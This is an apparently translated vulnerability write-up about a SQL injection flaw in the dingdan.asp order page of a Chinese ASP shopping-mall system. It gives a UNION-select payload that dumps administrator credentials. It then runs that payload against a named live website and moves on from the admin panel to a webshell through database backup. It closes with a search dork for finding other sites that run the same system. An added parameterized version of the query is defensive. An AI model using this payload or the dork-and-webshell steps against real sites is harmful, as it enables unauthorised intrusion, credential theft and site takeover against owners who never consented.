Author: flaw0r
Version: v1.1a Build 20090413 Access Free
Vulnerability 1: dingdan.asp injection vulnerability
Vulnerability level: severe
Problem code (dingdan.asp; the order number from the query string and the username from the cookie are both pasted straight into the SQL string):

    dingdan = request.QueryString("dan")
    Set rs = server.CreateObject("adodb.recordset")
    rs.open "select BJX_goods.bookid, BJX_goods.shjiaid, BJX_goods.bookname, BJX_goods.shichangjia, BJX_goods.huiyuanjia, " & _
        "bjx_action.actiondate, bjx_action.shousex, bjx_action.danjia, bjx_action.feiyong, bjx_action.fapiao, " & _
        "bjx_action.userzhenshiname, bjx_action.shouhuoname, bjx_action.dingdan, bjx_action.youbian, " & _
        "bjx_action.liuyan, bjx_action.zhifufangshi, bjx_action.songhuofangshi, bjx_action.zhuangtai, " & _
        "bjx_action.zonger, bjx_action.useremail, bjx_action.usertel, bjx_action.shouhuodizhi, " & _
        "bjx_action.bookcount, bjx_action.star, bjx_action.pingjia " & _
        "from BJX_goods inner join bjx_action on BJX_goods.bookid = bjx_action.bookid " & _
        "where bjx_action.username = '" & request.cookies("bjx")("username") & "' and dingdan = " & dingdan & "", conn, 1, 1
Injection test string:
http://192.168.1.3/yhshop/dingdan.asp?dan=2009422172358%20and%201=2%20union%20select% ,,2,admin,22,password,24,25%20from%20BJX_admin%20where%201=1
Frankly, this system leaves me speechless. It is almost identical to the BOBO online store system I analyzed earlier, so the vulnerability is the same as BOBO's. I am only giving one injection vulnerability here. I really don't know what people are thinking these days: can you make money off someone else's program? I despise people who steal other people's source code and sell it! (I am not saying this author copied the program and I am taking it for free; I despise BOBO first.)
The back end has a database backup function, so getting a shell is relatively simple.
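For contrast, this is an added hardened version of the dingdan.asp query above; it is example code, not the vendor's. It assumes the same table and column names, an already-open ADODB connection named conn, and that the dingdan column is numeric, as the unquoted comparison in the original implies.

```vbscript
<%
Option Explicit
' Hardened dingdan.asp lookup (added example). ADO constants are spelled out
' because adovbs.inc may not be included on the page.
Const adCmdText = 1
Const adVarChar = 200
Const adDouble = 5
Const adParamInput = 1

Dim dingdan, username, re, cmd, rs, sql

dingdan  = Request.QueryString("dan")
username = Request.Cookies("bjx")("username")

' Order numbers are digit strings such as 2009423113536, which overflows a
' VBScript Long, so validate the shape with a regex instead of CLng().
Set re = New RegExp
re.Pattern = "^[0-9]{1,20}$"
If Not re.Test(dingdan) Or Len(username) = 0 Or Len(username) > 50 Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid request."
    Response.End
End If

' The WHERE clause contains only placeholders. Both untrusted values (query
' string and cookie) are bound as parameters, so appending "and 1=2 union
' select ..." to the order number can no longer alter the statement.
sql = "select BJX_goods.bookname, bjx_action.dingdan, bjx_action.zonger, bjx_action.zhuangtai " & _
      "from BJX_goods inner join bjx_action on BJX_goods.bookid = bjx_action.bookid " & _
      "where bjx_action.username = ? and bjx_action.dingdan = ?"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = sql
cmd.Parameters.Append cmd.CreateParameter("username", adVarChar, adParamInput, 50, username)
' If dingdan is stored as text in your copy of the database, bind it with adVarChar instead.
cmd.Parameters.Append cmd.CreateParameter("dingdan", adDouble, adParamInput, 0, CDbl(dingdan))
Set rs = cmd.Execute

If rs.EOF Then
    ' No such order, or it belongs to another user: same answer either way.
    Response.Write "Order not found."
Else
    Response.Write Server.HTMLEncode(rs("bookname") & "") & " / order " & rs("dingdan")
End If

rs.Close : Set rs = Nothing : Set cmd = Nothing
%>
```

Parameter binding removes the injection shown in the write-up; the check that the order belongs to the cookie's user still depends on the cookie itself being trustworthy, which this snippet does not change.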
Practice on the network:
Baidu search: Yi and Sunshine Shopping Mall
Target chosen: http://eshop.iheeo.com/
First register a user, place an order for a product, then view and modify the order in the member center.
Submit our test string:
http://eshop.iheeo.com/dingdan.asp?dan=2009423113536%20and%201=2%20union%20select% ,,2,admin,22,password,24,25%20from%20BJX_admin%20where%201=1
The usernames and passwords of all administrators are displayed.
Log in to the back end with the administrator password, then back up the database to obtain a WEBSHELL.
Tip: a Google search for inurl:product.asp?iheeoid= turns up some websites that use this system!